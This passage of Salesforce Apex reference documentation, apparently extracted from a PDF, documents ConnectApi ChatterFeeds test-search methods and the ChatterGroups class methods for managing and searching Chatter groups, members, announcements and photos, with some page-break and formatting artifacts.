SEE ALSO:
searchFeedItemsInFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder,
String)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestSearchFeedItemsInFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, String q, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
802
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFeed(String, ConnectApi.FeedType, String, String)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestSearchFeedItemsInFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam, String q, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
803
Reference
ChatterFeeds Class
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder, String)
Testing ConnectApi Code
API Version
29.031.0
Signature
public static Void setTestSearchFeedItemsInFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q,
ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
804
Reference
ChatterFeeds Class
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
805
Reference
ChatterFeeds Class
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String)
Testing ConnectApi Code
API Version
29.031.0
Signature
public static Void setTestSearchFeedItemsInFeed(String communityId, ConnectApi.FeedType
feedType, String subjectId, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q,
Boolean showInternalOnly, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company and Filter.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
806
Reference
ChatterFeeds Class
AllUpdatesDisplays all updates from people and records the user follows and groups the user is a member of.
FewerUpdatesDisplays all updates from people and records the user follows and groups the user is a member of, but
hides some system-generated updates from records.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
result
Type: ConnectApi.FeedItemPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, String, Boolean)
Testing ConnectApi Code
807
Reference
ChatterFeeds Class
API Version
28.031.0
Signature
public static Void setTestSearchFeedItemsInFilterFeed(String communityId, String
subjectId, String keyPrefix, String q, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
Specify the test feed item page.
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFilterFeed(String, String, String, String)
Testing ConnectApi Code
808
Reference
ChatterFeeds Class
API Version
28.031.0
Signature
public static Void setTestSearchFeedItemsInFilterFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String keyPrefix, String pageParam,
Integer pageSize, ConnectApi.FeedSortOrder sortParam, String q, ConnectApi.FeedItemPage
result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
809
Reference
ChatterFeeds Class
result
Type: ConnectApi.FeedItemPage
Specify the test feed item page.
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFilterFeed(String, String, String, String, Integer, ConnectApi.FeedSortOrder, String)
Testing ConnectApi Code
API Version
29.031.0
Signature
public static Void setTestSearchFeedItemsInFilterFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String keyPrefix, Integer
recentCommentCount, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, String q, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
810
Reference
ChatterFeeds Class
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Specify the amount of content in a feed.
AllUpdatesDisplays all updates from people and records the user follows and groups the user is a member of.
FewerUpdatesDisplays all updates from people and records the user follows and groups the user is a member of, but
hides some system-generated updates from records.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
result
Type: ConnectApi.FeedItemPage
Specify the test feed item page.
Return Value
Type: Void
SEE ALSO:
searchFeedItemsInFilterFeed(String, String, String, Integer, ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder,
String)
Testing ConnectApi Code
811
Reference
ChatterGroups Class
ChatterGroups Class
Information about groups, such as the groups members, photo, and the groups the specified user is a member of. Add members to a
group, remove members, and change the group photo.
Namespace
ConnectApi
ChatterGroups Methods
The following are methods for ChatterGroups. All methods are static.
IN THIS SECTION:
addMember(String, String, String)
Adds the specified user to the specified group in the specified community as a standard member. To execute this method, the
context user must be the group owner or moderator.
addMemberWithRole(String, String, String, ConnectApi.GroupMembershipType)
Adds the specified user with the specified role to the specified group in the specified community. To execute this method, the
context user must be the group owner or moderator.
createGroup(String, ConnectApi.ChatterGroupInput)
Creates a group.
deleteMember(String, String)
Deletes the specified group membership.
deletePhoto(String, String)
Deletes the photo of the specified group.
getAnnouncements(String, String)
Gets the first page of announcements in a group. An announcement displays in a designated location in the Salesforce UI until 11:59
p.m. on its expiration date, unless its deleted or replaced by another announcement.
getAnnouncements(String, String, Integer, Integer)
Gets the specified page of announcements in a group. You can also specify the page size. An announcement displays in a designated
location in the Salesforce UI until 11:59 p.m. on its expiration date, unless its deleted or replaced by another announcement.
getGroup(String, String)
Returns information about the specified group.
getGroupBatch(String, List<String>)
Gets information about the specified list of groups. Returns a list of BatchResult objects containing
ConnectApi.ChatterGroup objects. Returns errors embedded in the results for groups that couldnt be loaded.
getGroupMembershipRequest(String, String)
Returns information about the specified request to join a private group.
getGroupMembershipRequests(String, String)
Returns information about every request to join the specified private group.
getGroupMembershipRequests(String, String, ConnectApi.GroupMembershipRequestStatus)
Returns information about every request to join the specified private group that has a specified status.
812
Reference
ChatterGroups Class
getGroups(String)
Returns the first page of all the groups. The page contains the default number of items.
getGroups(String, Integer, Integer)
Returns the specified page of information about all groups.
getGroups(String, Integer, Integer, ConnectApi.GroupArchiveStatus)
Returns the specified page of information about a set of groups with a specified group archive status.
getMember(String, String)
Returns information about the specified group member.
getMembers(String, String)
Returns the first page of information about all members of the specified group. The page contains the default number of items.
getMembers(String, String, Integer, Integer)
Returns the specified page of information about all members of the specified group.
getMembershipBatch(String, List<String>)
Gets information about the specified list of group memberships. Returns a list of BatchResult objects containing
ConnectApi.GroupMember objects. Returns errors embedded in the results for group memberships that couldnt be accessed.
getMyChatterSettings(String, String)
Returns the context users Chatter settings for the specified group.
getPhoto(String, String)
Returns information about the photo for the specified group.
postAnnouncement(String, String, String, ConnectApi.AnnouncementInput)
Posts an announcement to the group. An announcement displays in a designated location in the Salesforce UI until 11:59 p.m. on
its expiration date, unless its deleted or replaced by another announcement.
requestGroupMembership(String, String)
Requests membership in a private group for the context user.
searchGroups(String, String)
Returns the first page of groups that match the specified search criteria. The page contains the default number of items.
searchGroups(String, String, Integer, Integer)
Returns the specified page of groups that match the specified search criteria.
searchGroups(String, String, ConnectApi.GroupArchiveStatus, Integer, Integer)
Returns the specified page of groups that match the specified search criteria and that have the specified archive status.
setPhoto(String, String, String, Integer)
Sets the group photo to an already uploaded file. The key prefix must be 069 and the file size must be less than 2 MB.
setPhoto(String, String, ConnectApi.BinaryInput)
Sets the group photo to the specified blob..
setPhotoWithAttributes(String, String, ConnectApi.PhotoInput)
Sets and crops an already uploaded file as the group photo.
setPhotoWithAttributes(String, String, ConnectApi.PhotoInput, ConnectApi.BinaryInput)
Sets and crops a binary input as the group photo.
updateGroup(String, String, ConnectApi.ChatterGroupInput)
Update the settings of a group.
813
Reference
ChatterGroups Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMember addMember(String communityId, String groupId,
String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
userId
Type: String
The ID for a user.
Return Value
Type: ConnectApi.GroupMember
814
Reference
ChatterGroups Class
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMember addMemberWithRole(String communityId, String
groupId, String userId, ConnectApi.GroupMembershipType role)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
userId
Type: String
The ID for a user.
role
Type: ConnectApi.GroupMembershipType
The group membership type. One of these values:
GroupManager
StandardMember
Return Value
Type: ConnectApi.GroupMember
createGroup(String, ConnectApi.ChatterGroupInput)
Creates a group.
API Version
29.0
Requires Chatter
Yes
815
Reference
ChatterGroups Class
Signature
public static ConnectApi.ChatterGroupDetail createGroup(String, communityId,
ConnectApi.ChatterGroupInput groupInput)
Parameters
communityId
Type: String,
Use either the ID for a community, internal, or null.
groupInput
Type: ConnectApi.ChatterGroupInput
Return Value
Type: ConnectApi.ChatterGroupDetail
deleteMember(String, String)
Deletes the specified group membership.
API Version
28.0
Requires Chatter
Yes
Signature
public static Void deleteMember(String communityId, String membershipId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
membershipId
Type: String
The ID for a membership.
Return Value
Type: Void
816
Reference
ChatterGroups Class
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
deletePhoto(String, String)
Deletes the photo of the specified group.
API Version
28.0
Requires Chatter
Yes
Signature
public static Void deletePhoto(String communityId, String groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
Return Value
Type: Void
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
getAnnouncements(String, String)
Gets the first page of announcements in a group. An announcement displays in a designated location in the Salesforce UI until 11:59
p.m. on its expiration date, unless its deleted or replaced by another announcement.
API Version
31.0
Requires Chatter
Yes
817
Reference
ChatterGroups Class
Signature
public static ConnectApi.AnnouncementPage getAnnouncements(String communityId, String
groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
Return Value
Type: ConnectApi.AnnouncementPage
Usage
To post an announcement, call postAnnouncement(String, String, String, ConnectApi.AnnouncementInput).
To get information about a specific announcement, update the expiration date of an announcement, or delete an announcement, use
the methods of the ConnectApi.Announcements class.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.AnnouncementPage getAnnouncements(String communityId, String
groupId, Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
818
Reference
ChatterGroups Class
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.AnnouncementPage
Usage
To post an announcement, call postAnnouncement(String, String, String, ConnectApi.AnnouncementInput).
To get information about a specific announcement, update the expiration date of an announcement, or delete an announcement, use
the methods of the ConnectApi.Announcements class.
getGroup(String, String)
Returns information about the specified group.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroupDetail getGroup(String communityId, String groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
819
Reference
ChatterGroups Class
Return Value
Type: ConnectApi.ChatterGroupDetail
getGroupBatch(String, List<String>)
Gets information about the specified list of groups. Returns a list of BatchResult objects containing
ConnectApi.ChatterGroup objects. Returns errors embedded in the results for groups that couldnt be loaded.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.BatchResult[] getGroupBatch(String communityId, List<String>
groupIds)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupIds
Type: List<String>
A list of up to 500 group IDs.
Return Value
Type: BatchResult[]
The BatchResult.getResult() method returns a ConnectApi.ChatterGroup object.
Example
// Create a list of groups.
ConnectApi.ChatterGroupPage groupPage = ConnectApi.ChatterGroups.getGroups(null);
// Create a list of group IDs.
List<String> groupIds = new List<String>();
for (ConnectApi.ChatterGroup aGroup : groupPage.groups){
groupIds.add(aGroup.id);
}
// Get info about all the groups in the list.
ConnectApi.BatchResult[] batchResults = ConnectApi.ChatterGroups.getGroupBatch(null,
groupIds);
820
Reference
ChatterGroups Class
SEE ALSO:
getMembershipBatch(String, List<String>)
getGroupMembershipRequest(String, String)
Returns information about the specified request to join a private group.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMembershipRequest getGroupMembershipRequest(String
communityId, String requestId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
requestId
Type: String
The ID of a request to join a private group.
821
Reference
ChatterGroups Class
Return Value
Type: ConnectApi.GroupMembershipRequest
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
getGroupMembershipRequests(String, String)
Returns information about every request to join the specified private group.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMembershipRequests getGroupMembershipRequests(String
communityId, String groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
Return Value
Type: ConnectApi.GroupMembershipRequests
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
API Version
28.0
822
Reference
ChatterGroups Class
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMembershipRequests getGroupMembershipRequests(String
communityId, String groupId, ConnectApi.GroupMembershipRequestStatus status)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
status
Type: ConnectApi.GroupMembershipRequestStatus
statusThe status of a request to join a private group.
Accepted
Declined
Pending
Return Value
Type: ConnectApi.GroupMembershipRequests
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
getGroups(String)
Returns the first page of all the groups. The page contains the default number of items.
API Version
28.0
Requires Chatter
Yes
823
Reference
ChatterGroups Class
Signature
public static ConnectApi.ChatterGroupPage getGroups(String communityId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.ChatterGroupPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroupPage getGroups(String communityId, Integer
pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
824
Reference
ChatterGroups Class
Return Value
Type: ConnectApi.ChatterGroupPage
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroupPage getGroups(String communityId, Integer
pageParam, Integer pageSize, ConnectApi.GroupArchiveStatus archiveStatus)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
archiveStatus
Type: ConnectApi.GroupArchiveStatus
Specifies a set of groups based on whether the groups are archived or not.
AllAll groups, including groups that are archived and groups that are not archived.
ArchivedOnly groups that are archived.
NotArchivedOnly groups that are not archived.
If you pass in null, the default value is All.
Return Value
Type: ConnectApi.ChatterGroupPage
825
Reference
ChatterGroups Class
getMember(String, String)
Returns information about the specified group member.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMember getMember(String communityId, String membershipId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
membershipId
Type: String
The ID for a membership.
Return Value
Type: ConnectApi.GroupMember
getMembers(String, String)
Returns the first page of information about all members of the specified group. The page contains the default number of items.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMemberPage getMembers(String communityId, String groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
826
Reference
ChatterGroups Class
groupId
Type: String
The ID for a group.
Return Value
Type: ConnectApi.GroupMemberPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMemberPage getMembers(String communityId, String groupId,
Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
The number of items per page. Valid values are between 1 and 1000. If you pass null, pageSize is 25.
Return Value
Type: ConnectApi.GroupMemberPage
827
Reference
ChatterGroups Class
getMembershipBatch(String, List<String>)
Gets information about the specified list of group memberships. Returns a list of BatchResult objects containing
ConnectApi.GroupMember objects. Returns errors embedded in the results for group memberships that couldnt be accessed.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.BatchResult[] getMembershipBatch(String communityId,
List<String> membershipIds)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
membershipIds
Type: List<String>
A list of up to 500 group membership IDs.
Return Value
Type: BatchResult[]
The BatchResult getResults() method returns a ConnectApi.GroupMember object.
Example
// Get members of a group.
ConnectApi.GroupMemberPage membersPage = ConnectApi.ChatterGroups.getMembers(null,
'0F9D00000000oOT');
// Create a list of membership IDs.
List<String> membersList = new List<String>();
for (ConnectApi.GroupMember groupMember : membersPage.members){
membersList.add(groupMember.id);
}
// Get info about all group memberships in the list.
ConnectApi.BatchResult[] batchResults = ConnectApi.ChatterGroups.getMembershipBatch(null,
membersList);
for (ConnectApi.BatchResult batchResult : batchResults) {
if (batchResult.isSuccess()) {
// Operation was successful.
828
Reference
ChatterGroups Class
SEE ALSO:
getGroupBatch(String, List<String>)
getMyChatterSettings(String, String)
Returns the context users Chatter settings for the specified group.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupChatterSettings getMyChatterSettings(String communityId,
String groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
Return Value
Type: ConnectApi.GroupChatterSettings
829
Reference
ChatterGroups Class
getPhoto(String, String)
Returns information about the photo for the specified group.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo getPhoto(String communityId, String groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
Return Value
Type: ConnectApi.Photo
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.Announcement postAnnouncement(String communityId, String
groupId, ConnectApi.AnnouncementInput announcement)
830
Reference
ChatterGroups Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
announcement
Type: ConnectApi.AnnouncementInput
A ConnectApi.AnnouncementInput object.
Return Value
Type: ConnectApi.Announcement
Usage
Use an announcement to highlight information. Users can discuss, like, and post comments on announcements in the group feed. Group
members receive an email notification when you post an announcement, same as for other posts, depending on their selected group
email notification frequency. Deleting the feed post deletes the announcement.
To get information about all the announcements in a group, call getAnnouncements(String, String) or getAnnouncements(String, String,
Integer, Integer).
To get information about a specific announcement, update the expiration date of an announcement, or delete an announcement, use
the methods of the ConnectApi.Announcements class.
requestGroupMembership(String, String)
Requests membership in a private group for the context user.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMembershipRequest requestGroupMembership(String
communityId, String groupId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
831
Reference
ChatterGroups Class
groupId
Type: String
The ID for a group.
Return Value
Type: ConnectApi.GroupMembershipRequest
searchGroups(String, String)
Returns the first page of groups that match the specified search criteria. The page contains the default number of items.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroupPage searchGroups(String communityId, String q)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
Can be specified as null.
832
Reference
ChatterGroups Class
Return Value
Type: ConnectApi.ChatterGroupPage
SEE ALSO:
setTestSearchGroups(String, String, ConnectApi.ChatterGroupPage)
Testing ConnectApi Code
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroupPage searchGroups(String communityId, String q,
Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
Can be specified as null.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
833
Reference
ChatterGroups Class
Return Value
Type: ConnectApi.ChatterGroupPage
SEE ALSO:
setTestSearchGroups(String, String, Integer, Integer, ConnectApi.ChatterGroupPage)
Testing ConnectApi Code
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroupPage searchGroups(String communityId, String q,
ConnectApi.GroupArchiveStatus archiveStatus, Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
Can be specified as null.
archiveStatus
Type: ConnectApi.GroupArchiveStatus
archiveStatus Specifies a set of groups based on whether the groups are archived or not.
AllAll groups, including groups that are archived and groups that are not archived.
ArchivedOnly groups that are archived.
NotArchivedOnly groups that are not archived.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
834
Reference
ChatterGroups Class
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterGroupPage
SEE ALSO:
setTestSearchGroups(String, String, ConnectApi.GroupArchiveStatus, Integer, Integer, ConnectApi.ChatterGroupPage)
Testing ConnectApi Code
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo setPhoto(String communityId, String groupId, String
fileId, Integer versionNumber)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
fileId
Type: String
ID of a file already uploaded. The file must be an image smaller than 2 MB.
versionNumber
Type: Integer
Version number of the existing file. Specify either an existing version number or, to get the latest version, specify null.
835
Reference
ChatterGroups Class
Return Value
Type: ConnectApi.Photo
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
Photos are processed asynchronously and may not be visible right away.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo setPhoto(String communityId, String groupId,
ConnectApi.BinaryInput fileUpload)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
fileUpload
Type: ConnectApi.BinaryInput
A file to use as the photo. The content type must be usable as an image.
836
Reference
ChatterGroups Class
Return Value
Type: ConnectApi.Photo
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
Photos are processed asynchronously and may not be visible right away.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo setPhotoWithAttributes(String communityId, String groupId,
ConnectApi.PhotoInput photo)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
837
Reference
ChatterGroups Class
photo
Type: ConnectApi.PhotoInput
A ConnectApi.PhotoInput object that specifies the ID and version of the file, and how to crop the file.
Return Value
Type: ConnectApi.Photo
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
Photos are processed asynchronously and may not be visible right away.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo setPhotoWithAttributes(String communityId, String groupId,
ConnectApi.PhotoInput photo, ConnectApi.BinaryInput fileUpload)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
photo
Type: ConnectApi.PhotoInput
A ConnectApi.PhotoInput object that specifies how to crop the file specified in fileUpload.
fileUpload
Type: ConnectApi.BinaryInput
A file to use as the photo. The content type must be usable as an image.
838
Reference
ChatterGroups Class
Return Value
Type: ConnectApi.Photo
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
Photos are processed asynchronously and may not be visible right away.
API Version
